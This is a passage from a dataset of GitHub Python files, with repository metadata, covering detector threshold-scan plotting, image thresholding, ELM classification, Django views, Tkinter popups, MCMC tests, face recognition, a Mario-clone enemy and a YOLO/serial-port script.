distribution\n for i in range(len(f.root.ThDist)):\n dat=f.root.ThDist[i]\n plotting.plot_2d_pixel_hist(dat[\"mu\"],title=str(f.root.ThDist.title)+\" (TH = %.3f V)\"%global_th,\n z_min=0.0,\n z_max='median',\n z_axis_title='Threshold')\n plotting.plot_1d_pixel_hists_gauss([dat[\"mu\"]],mask=injected,\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Threshold [e]\",\n x_axis_title=\"Testpulse injection [V]\",\n title=str(f.root.ThDist.title)+\" (TH = %.3f V)\"%global_th)\n ## Noise distribution\n for i in range(len(f.root.NoiseDist)):\n dat=f.root.NoiseDist[i]\n plotting.plot_2d_pixel_hist(dat[\"sigma\"],title=str(f.root.NoiseDist.title),\n z_min=0.0, \n z_max='median',\n z_axis_title='Noise')\n plotting.plot_1d_pixel_hists_gauss([dat[\"sigma\"]],mask=injected,\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Noise [e]\",\n x_axis_title=\"S-curve Sigma [V]\",\n title=str(f.root.NoiseDist.title))\n \n if pixel_scurve:\n for p_i,p in enumerate(np.argwhere(injected)):\n res=monopix_daq.analysis.utils.get_scurve(f_event=f, pixel=p, type=\"inj\")\n plotting.plot_scurve([res],\n dat_title=[\"mu=%.4f sigma=%.4f\"%(res[\"mu\"],res[\"sigma\"])],\n title=\"Pixel [%d %d], Threshold = %.4f\"%(p[0],p[1],global_th),\n y_min=0,\n y_max=inj_n*1.5,\n reverse=False)\n else:\n pass\n if perflavour:\n for col in range(0,36,4):\n ## Threshold distribution\n for i in range(len(f.root.ThDist)):\n dat=f.root.ThDist[i]\n dat_flav=np.zeros_like(dat[\"mu\"])\n dat_flav[col:col+4,:]=dat[\"mu\"][col:col+4,:]\n plotting.plot_2d_pixel_hist(dat_flav,title=str(f.root.ThDist.title)+\" (Flavour %.1d)\"%(col/4)+\" (TH = %.3f V)\"%global_th,\n z_min=0.0,\n z_max='median',\n z_axis_title='Threshold')\n plotting.plot_1d_pixel_hists_gauss([dat[\"mu\"][col:col+4,:]],mask=injected[col:col+4,:],\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Threshold [e]\",\n x_axis_title=\"Testpulse injection [V]\",\n title=str(f.root.ThDist.title)+\" (Flavour %.1d)\"%((col/4)+1)+\" (TH = %.3f V)\"%global_th)\n ## Noise distribution\n for i in range(len(f.root.NoiseDist)):\n dat=f.root.NoiseDist[i]\n dat_flav=np.zeros_like(dat[\"sigma\"])\n dat_flav[col:col+4,:]=dat[\"sigma\"][col:col+4,:]\n plotting.plot_2d_pixel_hist(dat_flav,title=str(f.root.NoiseDist.title)+\" (Flavour %.1d)\"%(col/4),\n z_min=0.0, \n z_max='median',\n z_axis_title='Noise')\n plotting.plot_1d_pixel_hists_gauss([dat[\"sigma\"][col:col+4,:]],mask=injected[col:col+4,:],\n top_axis_factor=INJCAP/1.602E-19,\n top_axis_title=\"Noise [e]\",\n x_axis_title=\"S-curve Sigma [V]\",\n title=str(f.root.NoiseDist.title)+\" (Flavour %.1d)\"%((col/4)+1))\n\nif __name__ == \"__main__\":\n from monopix_daq import monopix\n import argparse\n \n parser = argparse.ArgumentParser(usage=\"python th_scan.py\",\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"--config_file\", type=str, default=None)\n parser.add_argument('-t',\"--th\", type=float, default=None)\n\n parser.add_argument('-ib',\"--inj_start\", type=float, \n default=local_configuration[\"injlist\"][0])\n parser.add_argument('-ie',\"--inj_stop\", type=float, \n default=local_configuration[\"injlist\"][-1])\n parser.add_argument('-is',\"--inj_step\", type=float, \n default=local_configuration[\"injlist\"][1]-local_configuration[\"injlist\"][0])\n\n parser.add_argument(\"-nmp\",\"--n_mask_pix\",type=int,default=local_configuration[\"n_mask_pix\"])\n parser.add_argument(\"-f\",\"--flavor\", type=str, default=None)\n parser.add_argument(\"-p\",\"--power_reset\", action='store_const', const=1, default=0) ## defualt=True: skip power reset\n\n args=parser.parse_args()\n local_configuration[\"injlist\"]=np.arange(args.inj_start,args.inj_stop,args.inj_step)\n local_configuration[\"n_mask_pix\"]=args.n_mask_pix\n\n m=monopix.Monopix(no_power_reset=not bool(args.power_reset))\n scan = ThScan(m,online_monitor_addr=\"tcp://127.0.0.1:6500\")\n \n if args.config_file is not None:\n m.load_config(args.config_file)\n if args.th is not None:\n m.set_th(args.th)\n if args.flavor is not None:\n if args.flavor==\"all\":\n collist=np.arange(0,m.COL_SIZE)\n else:\n tmp=args.flavor.split(\":\")\n collist=np.arange(int(tmp[0]),int(tmp[1]))\n pix=[]\n for i in collist:\n for j in range(0,m.ROW_SIZE):\n pix.append([i,j])\n m.set_preamp_en(pix)\n else:\n pix=list(np.argwhere(m.dut.PIXEL_CONF[\"PREAMP_EN\"][:,:]))\n local_configuration[\"pix\"]=pix \n\n scan.start(**local_configuration)\n scan.analyze()\n scan.plot()\n","repo_name":"SiLab-Bonn/monopix_daq","sub_path":"monopix_daq/scans/th_scan.py","file_name":"th_scan.py","file_ext":"py","file_size_in_byte":10460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"43540772184","text":"#Faça um programa que peça uma nota, entre zero e dez. Mostre uma mensagem caso o valor seja inválido e \n#continue pedindo até que o usuário informe um valor válido.\n\nnota = input(\"Escreva um nota de zero a dez: \")\n#int_nota = int(nota)\nint_nota_escolhida = \"7\"\n\nwhile nota != int_nota_escolhida:\n print (\"Valor invalido!\")\n nota = input(\"Escolha outro valor: \")\n\nprint(\"Valor correto!\")","repo_name":"brmarcosgomes/Projeto-Python","sub_path":"Exercicios/valor_correto.py","file_name":"valor_correto.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21764649216","text":"import centrosome\nimport numpy\nimport skimage\nfrom cellprofiler.library.functions.image_processing import (\n get_adaptive_threshold,\n get_global_threshold,\n apply_threshold,\n)\n\n\ndef threshold(\n image,\n mask=None,\n threshold_scope=\"global\",\n threshold_method=\"otsu\",\n assign_middle_to_foreground=\"foreground\",\n log_transform=False,\n threshold_correction_factor=1,\n threshold_min=0,\n threshold_max=1,\n window_size=50,\n smoothing=0,\n lower_outlier_fraction=0.05,\n upper_outlier_fraction=0.05,\n averaging_method=\"mean\",\n variance_method=\"standard_deviation\",\n number_of_deviations=2,\n volumetric=False,\n automatic=False,\n **kwargs,\n):\n \"\"\"\n Returns three threshold values and a binary image.\n Thresholds returned are:\n\n Final threshold: Threshold following application of the\n threshold_correction_factor and clipping to min/max threshold\n\n orig_threshold: The threshold following either adaptive or global\n thresholding strategies, prior to correction\n\n guide_threshold: Only produced by adaptive threshold, otherwise None.\n This is the global threshold that constrains the adaptive threshold\n within a certain range, as defined by global_limits (default [0.7, 1.5])\n \"\"\"\n\n if automatic:\n # Use automatic settings\n smoothing = 1\n log_transform = False\n threshold_scope = \"global\"\n threshold_method = \"minimum_cross_entropy\"\n\n # Only pass robust_background kwargs when selected as the threshold_method\n if threshold_method.casefold() == \"robust_background\":\n kwargs = {\n \"lower_outlier_fraction\": lower_outlier_fraction,\n \"upper_outlier_fraction\": upper_outlier_fraction,\n \"averaging_method\": averaging_method,\n \"variance_method\": variance_method,\n \"number_of_deviations\": number_of_deviations,\n }\n\n if threshold_scope.casefold() == \"adaptive\":\n final_threshold = get_adaptive_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n window_size=window_size,\n threshold_min=threshold_min,\n threshold_max=threshold_max,\n threshold_correction_factor=threshold_correction_factor,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n volumetric=volumetric,\n **kwargs,\n )\n orig_threshold = get_adaptive_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n window_size=window_size,\n # If automatic=True, do not correct the threshold\n threshold_min=threshold_min if automatic else 0,\n threshold_max=threshold_max if automatic else 1,\n threshold_correction_factor=threshold_correction_factor if automatic else 1,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n volumetric=volumetric,\n **kwargs,\n )\n\n guide_threshold = get_global_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n threshold_min=threshold_min,\n threshold_max=threshold_max,\n threshold_correction_factor=threshold_correction_factor,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n **kwargs,\n )\n\n binary_image, sigma = apply_threshold(\n image,\n threshold=final_threshold,\n mask=mask,\n smoothing=smoothing,\n )\n\n return final_threshold, orig_threshold, guide_threshold, binary_image, sigma\n\n elif threshold_scope.casefold() == \"global\":\n final_threshold = get_global_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n threshold_min=threshold_min,\n threshold_max=threshold_max,\n threshold_correction_factor=threshold_correction_factor,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n **kwargs,\n )\n orig_threshold = get_global_threshold(\n image,\n mask=mask,\n threshold_method=threshold_method,\n # If automatic=True, do not correct the threshold\n threshold_min=threshold_min if automatic else 0,\n threshold_max=threshold_max if automatic else 1,\n threshold_correction_factor=threshold_correction_factor if automatic else 1,\n assign_middle_to_foreground=assign_middle_to_foreground,\n log_transform=log_transform,\n **kwargs,\n )\n guide_threshold = None\n binary_image, sigma = apply_threshold(\n image,\n threshold=final_threshold,\n mask=mask,\n smoothing=smoothing,\n )\n return final_threshold, orig_threshold, guide_threshold, binary_image, sigma\n","repo_name":"CellProfiler/CellProfiler","sub_path":"cellprofiler/library/modules/_threshold.py","file_name":"_threshold.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":819,"dataset":"github-code","pt":"69"}
+{"seq_id":"40913451881","text":"def cmmdc(a,b):\n r = a%b\n if r==0:\n return b\n elif r==1:\n return 1\n print(b)\n return cmmdc(b,r)\nif __name__ == '__main__':\n print(cmmdc(216,28))\n","repo_name":"ionutsturzu/recursivitate","sub_path":"cel_mai_mare_divizor_comun.py","file_name":"cel_mai_mare_divizor_comun.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74751244059","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pickle\nfrom ELMClassifier.random_hidden_layer import RBFRandomHiddenLayer\nfrom ELMClassifier.random_hidden_layer import SimpleRandomHiddenLayer\nfrom ELMClassifier.elm import ELMClassifier\nfrom ELMClassifier.random_layer import GRBFRandomLayer\nimport os\nimport sklearn.metrics as metrics\nfrom scipy.fftpack import fft,hilbert\nimport time\nimport numpy as np\nfrom ELMClassifier.label_smoothing_elm import ELMClassifierLabelSmooth\nfrom config import opt\nimport torch\nimport random\n\ndef input_mapping(x,B):\n B_proj = (2. * np.pi)*B\n x = fft(x)\n xr = x.real @ np.cos(B_proj) - x.imag @ np.sin(B_proj)\n xi = x.imag @ np.cos(B_proj) + x.real @ np.sin(B_proj)\n return np.concatenate([xr,xi],axis=1)\n\n# def input_mapping(x,B):\n# z = fft(x)\n# return np.concatenate([z.real,z.imag],axis=1)\n\n# def input_mapping(x,B):\n# return x\n\ndef kelm_train(x_train,y_train,hidden_layer='rbf',n_hidden = 1000,use_label_smooth=False,B=None):\n print(\" Begin training\")\n start = time.time()\n if hidden_layer == 'rbf':\n siglayer = RBFRandomHiddenLayer(n_hidden=n_hidden, gamma=1e-3, use_exemplars=False)\n elif hidden_layer == 'sigmoid':\n siglayer = SimpleRandomHiddenLayer(n_hidden=n_hidden, activation_func='sigmoid')\n elif hidden_layer =='grbf':\n siglayer = GRBFRandomLayer(n_hidden=n_hidden, grbf_lambda=1e-3)\n\n if use_label_smooth:\n print(\"use_label_smooth:\")\n clf = ELMClassifierLabelSmooth(siglayer)\n else:\n clf = ELMClassifier(siglayer)\n\n\n x_train = input_mapping(x_train,B)\n\n clf.fit(x_train, y_train)\n end = time.time()\n print(\" Training time\", end - start)\n return clf\n # joblib.dump(clf, './KELM/·' + opt.model + '_KELM_' + str(n_hidden) + '.pkl')\n\n\n\ndef kelm_test(clf ,x_test, y_test,prec1 = 0,B=None):\n print(\" Begin testing\")\n start = time.time()\n # print(x_test.shape)\n top1,top5 = clf.predict(input_mapping(x_test,B))\n\n end = time.time()\n print(\" Testing time\", end - start)\n # isTrue = top1 == y_test\n # # print(pre_result.size)\n # acc = np.sum(isTrue == True) / top1.size * 100\n\n top1acc = top1_acc(top1, y_test)\n top5acc = top5_acc(top5, y_test)\n class_acc = metrics.balanced_accuracy_score(top1, y_test) * 100\n print(' top1 Acc:',top1acc)\n print(' top5 Acc:',top5acc)\n print(' class Acc:', class_acc)\n print(' Promote',top1acc - prec1)\n\ndef top5_acc(top5,target):\n y_test_ = target.reshape(-1, 1)\n top5_is_true = y_test_ == top5\n return np.sum(top5_is_true == True) / target.size * 100\n\ndef top1_acc(top1,target):\n isTrue = top1 == target\n return np.sum(isTrue == True) / target.size * 100\n\n\ndef read_npys(filename):\n dict = np.load(filename,allow_pickle=True).item()\n label = dict['label']\n feature = dict['feature']\n target = dict['target']\n return label,feature,target\n\n#DGCNN 92.22, 99.35\n#PointNet 89.8703,98.7034\ndef get_perc():\n\n return 92.22, 99.35\n\nif __name__ == '__main__':\n seed = 0\n np.random.seed(seed)\n torch.random.manual_seed(seed)\n random.seed(seed)\n # main()\n print(opt.model+'____'+opt.dataset)\n dir = 'npys/'+'DGCNNMN40'\n train_filename = dir+'/train.npy'\n test_filename = dir + '/test.npy'\n\n label_train,feature_train,target_train = read_npys(train_filename)\n label_test, feature_test, target_test = read_npys(test_filename)\n\n prec1,prec5 = get_perc()\n print('Original top1:',prec1)\n print('Original top5:',prec5)\n\n # label elm\n print('label based:')\n # label_clf = kelm_train(label_train,target_train,'sigmoid',1000,use_label_smooth=False)\n # kelm_test(label_clf, label_test, target_test, prec1)\n\n # label_clf = kelm_train(label_train, target_train, 'sigmoid', 369, use_label_smooth=False)\n # print('--------------------------------------------')\n # kelm_test(label_clf, label_test, target_test, prec1)\n #\n # Bguass = np.random.normal(loc=0.0,scale=1.0,size=(40,333))\n # label_clf = kelm_train(label_train, target_train, 'rbf', 666, B=Bguass)\n # kelm_test(label_clf, label_test, target_test, prec1,B=Bguass)\n\n # feature elm\n print('feature based:')\n Bguass = np.random.normal(loc=0.0,scale=1.0,size=(2048,2048))\n feature_clf =kelm_train(feature_train,target_train,'rbf',2400,B=Bguass)\n kelm_test(feature_clf,feature_test,target_test,prec1,B=Bguass)\n\n # rbf 2500\n # rbf 2350 -2.71\n # rbf 2400 -2.55\n # rbf 2401 -2.67\n # rbf 2500 -2.71\n # rbf 2600 -2.87\n # rbf 2700 -2.75\n # rbf 2800 -2.75\n # rbf 2900 -2.79\n # rbf 3000 -2.63\n # rbf 3100 -2.71\n","repo_name":"lizhuangzi/PointELM","sub_path":"testComplexKELMDGCNN.py","file_name":"testComplexKELMDGCNN.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"21722825152","text":"from django.shortcuts import redirect, render\nfrom django.urls import is_valid_path\nfrom .forms import ArticleCreateForm\n\nfrom .models import Article\n\ndef article_list(request):\n template_name = \"articles/article_list.html\"\n articles = Article.objects.all().order_by(\"-created_at\")\n picked_up_articles = Article.objects.filter(is_picked_up=True).order_by(\"-created_at\")\n\n content = {\n \"articles\": articles,\n \"picked_up_articles\": picked_up_articles,\n }\n return render(request, template_name, content)\n\ndef article_detail(request, pk):\n article = Article.objects.get(pk = pk)\n content = {\n \"article\": article,\n \"twitter_card\": article,\n }\n template_name = \"articles/article_detail.html\"\n return render(request, template_name, content)\n\ndef article_create(request):\n params = {\"title\": \"\", \"thumbnail\": \"\", \"caption\": \"\", \"author\": \"\", \"description\": \"\", \"body\": \"\", \"from\": None}\n\n if request.method == 'POST':\n form = ArticleCreateForm(request.POST)\n\n if form.is_valid():\n form.save()\n else:\n print(\"ret\")\n # return redirect(article_list)\n else:\n params['form'] = ArticleCreateForm()\n\n content = {}\n template_name = \"articles/article_create.html\"\n return render(request, template_name, params)","repo_name":"okmtyuta/archive","sub_path":"MyPages/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5003044073","text":"__author__ = 'Harvs'\n\nimport Tkinter as tk\nfrom Tkinter import *\nfrom ttk import *\nimport ttk\nimport tkMessageBox as tm\n\n\ndef popup_add_to_cart(parent):\n class Popup(object):\n\n def __init__(self):\n self.top = Toplevel(parent, takefocus=True)\n self.top.resizable(0, 0)\n self.top.title(\"Add To Cart\")\n self.customer = None\n\n self.frame = ttk.Frame(self.top)\n self.frame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n self.labelframe1 = ttk.LabelFrame(self.frame)\n self.labelframe1.pack(fill='both', expand='yes', padx=5, pady=5)\n self.customer_name_label = Label(self.labelframe1, text='Name of customer:')\n self.customer_name_label.grid(row=0, column=0, padx=5, pady=5)\n self.customer_name_field = Entry(self.labelframe1)\n self.customer_name_field.focus_set()\n self.customer_name_field.grid(row=0, column=1, padx=5, pady=5)\n\n self.labelframe2 = ttk. LabelFrame(self.frame)\n self.labelframe2.pack(fill='both', expand='yes', padx=5, pady=5)\n self.add_label = ttk.Label(self.labelframe2, text='Add order to cart?')\n self.add_label.pack(side=TOP, padx=5, pady=5)\n self.yes_btn = Button(self.labelframe2, text='Yes', command=self.do)\n self.no_btn = Button(self.labelframe2, text='No', command=self.no)\n self.yes_btn.pack(side=RIGHT, padx=5, pady=5)\n self.no_btn.pack(side=LEFT, padx=5, pady=5)\n self.yes_btn.focus_set()\n self.top.bind(\"\", self.do)\n self.top.grab_set()\n\n def do(self):\n self.customer = self.customer_name_field.get()\n if len(self.customer) > 0:\n self.top.grab_release()\n self.top.destroy()\n else:\n tm.showerror(\"Add to cart error\", \"Invalid Customer Name\", parent=self.top)\n\n def no(self):\n self.top.grab_release()\n self.top.destroy()\n\n pop = Popup()\n parent.wait_window(pop.top)\n\n customer = pop.customer\n del pop\n\n return customer\n\n\ndef popup_cancel_order(parent):\n class Popup(object):\n\n def __init__(self):\n self.top = Toplevel(parent, takefocus=True)\n self.top.resizable(0, 0)\n self.top.title(\"Cancel Order\")\n self.value = None\n\n self.frame = ttk.Frame(self.top)\n self.frame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n self.labelframe1 = ttk.LabelFrame(self.frame, text='Confirm Action')\n self.labelframe1.pack(fill=\"both\", expand=\"yes\", padx=5, pady=5)\n self.customer_name_label = Label(self.labelframe1, text=\"Cancel Order?\")\n self.customer_name_label.grid(row=0, column=0, padx=3, pady=5)\n\n self.yes_btn = Button(self.frame, text='Yes', command=self.do)\n self.no_btn = Button(self.frame, text='No', command=self.no)\n self.yes_btn.pack(side=RIGHT, padx=5, pady=10)\n self.no_btn.pack(side=RIGHT, padx=5, pady=10)\n self.yes_btn.focus_set()\n self.top.bind(\"\", self.do)\n self.top.grab_set()\n\n def do(self):\n self.value = 1\n self.top.grab_release()\n self.top.destroy()\n\n def no(self):\n self.value = 0\n self.top.grab_release()\n self.top.destroy()\n\n pop = Popup()\n parent.wait_window(pop.top)\n\n value = pop.value\n del pop\n\n return value\n\n\ndef popup_incomplete_details_error(parent):\n tm.showerror(\"Add to cart error\", \"Incomplete Order Details\", parent=parent)\n","repo_name":"hsarbas/yolotea","sub_path":"0.2/yolotea/popups.py","file_name":"popups.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70275991900","text":"import pytest\nimport numpy\n\nfrom epsie.proposals import (Normal, Eigenvector, BoundedNormal, Angular)\n\nfrom test_ptsampler import _create_sampler\n\nfrom _utils import Model\n\nSTABILITY_DURATION = 48\nDURATION = 16\n\n\ndef _setup_proposal(proposal_name, jump_interval, params):\n duration = STABILITY_DURATION + DURATION\n if proposal_name == 'normal':\n return Normal(params, jump_interval=jump_interval,\n jump_interval_duration=duration)\n elif proposal_name == 'eigenvector':\n return Eigenvector(params, jump_interval=jump_interval,\n jump_interval_duration=duration)\n elif proposal_name == 'bounded_normal':\n bounds = {'x0': (-20, 20), 'x1': (-40, 40)}\n return BoundedNormal(params, bounds, jump_interval=jump_interval,\n jump_interval_duration=duration)\n elif proposal_name == 'angular':\n return Angular(params, jump_interval=jump_interval,\n jump_interval_duration=duration)\n else:\n return -1\n\n\ndef _extract_positions(chains, kind='current'):\n out = numpy.zeros((len(chains), len(chains[0].chains), 2))\n for i, chain in enumerate(chains):\n for j, subchain in enumerate(chain.chains):\n if kind == 'proposed':\n out[i, j, :] = list(subchain.proposed_position.values())\n else:\n out[i, j, :] = list(subchain.current_position.values())\n return out\n\n\n@pytest.mark.parametrize('nprocs', [1, 4])\n@pytest.mark.parametrize('proposal_name', ['normal', 'eigenvector',\n 'bounded_normal', 'angular'])\n@pytest.mark.parametrize('jump_interval', [1, 2, 5])\ndef test_jump_proposal_interval(nprocs, proposal_name, jump_interval):\n model = Model()\n # let x0 be the slow parameter and x1 the fast one\n proposal = _setup_proposal(proposal_name, jump_interval, params=['x0'])\n sampler = _create_sampler(model, nprocs, proposals=[proposal])\n # Run the sampler for some number of initial iterations\n sampler.run((STABILITY_DURATION + 1) * jump_interval)\n\n for _ in range((DURATION - 1) * jump_interval):\n current_pos = _extract_positions(sampler.chains, 'current')\n sampler.run(1)\n proposed_pos = _extract_positions(sampler.chains, 'proposed')\n\n # check that x0 are different if proposing a move, else the same\n if (sampler.niterations - 1) % jump_interval != 0:\n numpy.testing.assert_equal(current_pos[:, :, 0],\n proposed_pos[:, :, 0])\n else:\n assert numpy.all(current_pos[:, :, 0] != proposed_pos[:, :, 0])\n # check that x1 proposed position is always different\n assert numpy.all(current_pos[:, :, 1] != proposed_pos[:, :, 1])\n\n # Now that the burnin phase is over check both x0 and x1 are proposed at\n # each turn\n for i in range(DURATION):\n current_pos = _extract_positions(sampler.chains, 'current')\n sampler.run(1)\n proposed_pos = _extract_positions(sampler.chains, 'proposed')\n\n assert numpy.all(current_pos != proposed_pos)\n","repo_name":"cdcapano/epsie","sub_path":"test/test_jump_interval.py","file_name":"test_jump_interval.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"28657870985","text":"# 왼, 오 창문을 열었을 때 양쪽 모두 2 이상! 의 공간\n# 맨 왼쪽 두칸과 오른쪾 두칸은 건물이 없다\n# 최대 높이는 255\n\ndef sunlight():\n ans = 0\n for i in range(2, n-2):\n h = a[i]\n other = max(a[i-2],a[i-1],a[i+1],a[i+2])\n ans += h-other if h>other else 0\n return ans\n\n\nfor t in range(10):\n n = int(input())\n a = list(map(int, input().split()))\n print(f'#{t+1}', sunlight())\n","repo_name":"hjle2/Algorithm","sub_path":"SWEA/1206. [SW 문제해결 기본] 1일차 - View.py","file_name":"1206. [SW 문제해결 기본] 1일차 - View.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4380341296","text":"import cv2\nimport numpy as np\nimport os, glob\n\n# 변수 설정 --- ①\nbase_dir = './faces'\ntrain_data, train_labels = [], []\n\n\ndirs = [d for d in glob.glob(base_dir+\"/*\") if os.path.isdir(d)]\nprint('Collecting train data set:')\nfor dir in dirs:\n # name_id 형식에서 id를 분리 ---②\n id = dir.split('_')[1] \n files = glob.glob(dir+'/*.jpg')\n print('\\t path:%s, %dfiles'%(dir, len(files)))\n for file in files:\n img = cv2.imread(file, cv2.IMREAD_GRAYSCALE)\n # 이미지는 train_data, 아이디는 train_lables에 저장 ---③\n train_data.append(np.asarray(img, dtype=np.uint8))\n train_labels.append(int(id))\n\n# NumPy 배열로 변환 ---④\ntrain_data = np.asarray(train_data)\ntrain_labels = np.int32(train_labels)\n\n# LBP 얼굴인식기 생성 및 훈련 ---⑤\nprint('Starting LBP Model training...')\nmodel = cv2.face.LBPHFaceRecognizer_create()\nmodel.train(train_data, train_labels)\nmodel.write('./faces/all_face.xml')\nprint(\"Model trained successfully!\")\n","repo_name":"dltpdn/insightbook.opencv_project_python","sub_path":"09.ml/lbp_face2_train.py","file_name":"lbp_face2_train.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"69"}
+{"seq_id":"24424338230","text":"from classes.Animation import Animation\nfrom classes.Collider import Collider\nfrom classes.EntityCollider import EntityCollider\nfrom entities.EntityBase import EntityBase\nfrom traits.leftrightwalk import LeftRightWalkTrait\nfrom entities.Particles import KnockedOff,Points\nfrom classes.Spritesheet import MobSheet\n\nsprites = MobSheet()\n\nclass Goomba(EntityBase):\n def __init__(self, screen, x, y, variant, level, sound):\n super(Goomba, self).__init__(x,y,1.25)\n self.screen = screen\n images = [sprites.get(\"goomba1\",variant),sprites.get(\"goomba2\",variant)]\n self.animation = Animation(images)\n self.squishedImage = sprites.get(\"goombaD\",variant)\n self.leftrightTrait = LeftRightWalkTrait(self, level, direction=-1)\n self.type = \"Mob\"\n self.collision = Collider(self, level)\n self.EntityCollider = EntityCollider(self)\n self.levelObj = level\n self.stomped = False\n self.sound = sound\n self.checkZone()\n\n def update(self, shift):\n if self.stomped:\n self.stomp(shift)\n elif self.knockedoff:\n self.knockoff()\n elif self.alive:\n self.applyGravity()\n self.drawGoomba(shift)\n self.leftrightTrait.update()\n self.checkEntityCollision()\n\n def drawGoomba(self, shift):\n self.screen.blit(self.animation.image, ((self.getPosIndexAsFloat().x+shift)*32, self.rect.y))\n self.animation.update()\n\n def stomp(self, shift):\n if self.timer == 0:\n points = Points(self.levelObj.dashboard,self.rect.x,self.rect.y,100)\n self.levelObj.entities.add(points)\n if self.timer < self.timeAfterDeath:\n self.screen.blit(self.squishedImage,((self.getPosIndexAsFloat().x+shift)*32, self.rect.y))\n else:\n self.alive = False\n self.timer += 0.1\n \n def knockoff(self):\n self.image = self.animation.image\n self.alive = False\n self.levelObj.dashboard.points += 100\n entity = KnockedOff(self.screen,self,self.sound)\n self.levelObj.entities.add(entity)\n \n def checkEntityCollision(self):\n for ent in self.levelObj.entities:\n collisionState = self.EntityCollider.check(ent)\n if self.rect.colliderect(ent.rect):\n if ent.type == \"Mob\" or ent.type == \"Object\":\n ent.collide(self, collisionState)\n\n def collide(self,player,collisionState):\n if not(self.stomped or self.knockedoff):\n if player.type == \"Player\":\n if collisionState.isTop:\n self.sound.play_sfx(\"stomp\")\n player.rect.bottom = self.rect.top\n player.bounce()\n self.stomped = True\n self.levelObj.dashboard.points += 100\n elif player.star:\n self.knockedoff = True\n self.levelObj.dashboard.points += 400\n points = Points(self.levelObj.dashboard,self.rect.x,self.rect.y,500)\n self.levelObj.entities.add(points)\n else:\n player.damage()","repo_name":"averyl56/mario-bros-remake","sub_path":"entities/Goomba.py","file_name":"Goomba.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15186157382","text":"import getRootPath\nimport json\n\n\ndef writerjson(path, data):\n \"\"\"\n 将dict写入文本,w+ 直接把原来的文本覆盖\n :return:\n \"\"\"\n with open(getRootPath.getRootPath() + path, \"w+\", encoding=\"utf8\") as f:\n json.dump(data, f)\n\n\ndef readjson(path):\n \"\"\"\n 读json\n :return:\n \"\"\"\n with open(getRootPath.getRootPath() + path, \"r\", encoding=\"utf8\") as f:\n allproduct_list = json.loads(f.read())\n return allproduct_list\n\n\ndef getAccount(name):\n \"\"\"\n 获取账号信息\n :param name:\n :return:\n \"\"\"\n accountdict = readjson(\"/config/account.conf\")\n account = accountdict[name]\n return [account[\"account\"], account[\"password\"]]\n\n\ndef jsonToDict(pathstr):\n \"\"\"\n json转换dict\n :param pathstr:\n :return:\n \"\"\"\n rootPath = getRootPath.getRootPath()\n confpath = rootPath + pathstr\n\n with open(confpath, 'r', encoding=\"utf8\") as confFile:\n confStr = confFile.read()\n\n conf = json.JSONDecoder().decode(confStr)\n return conf","repo_name":"mysticbinary/EasierSpider","sub_path":"tools/json_tool.py","file_name":"json_tool.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"16187146726","text":"import time\nfrom socket import timeout\nfrom struct import unpack\n\nimport numpy as np\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow,QDialog, QApplication, QWidget, QTableWidgetItem, QGridLayout\nfrom PyQt5.uic import loadUi\nfrom PyQt5.QtGui import *\nimport cv2\nimport serial, sys\nfrom PyQt5.QtCore import *\n\nser = serial.Serial('COM8', 9600, timeout=1)\n\ndata_1 = []\ndata_2 = []\ndata_3 = []\ndata_4 = []\n\n\nclass Worker(QThread):\n ImageUpdate = pyqtSignal(QImage)\n\n modelConfiguration = 'yolov4-tiny_kastem.cfg'\n modelWeights = 'yolov4-tiny_kastem_last.weights'\n net = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeights)\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n classesFile = 'classes.names'\n classNames = []\n with open(classesFile, 'rt') as f:\n classNames = f.read().rstrip('\\n').split('\\n')\n\n whT = 320\n\n def run(self):\n Capture = cv2.VideoCapture(0)\n self.ThreadActive = True\n while self.ThreadActive:\n ret, frame = Capture.read()\n if ret:\n blob = 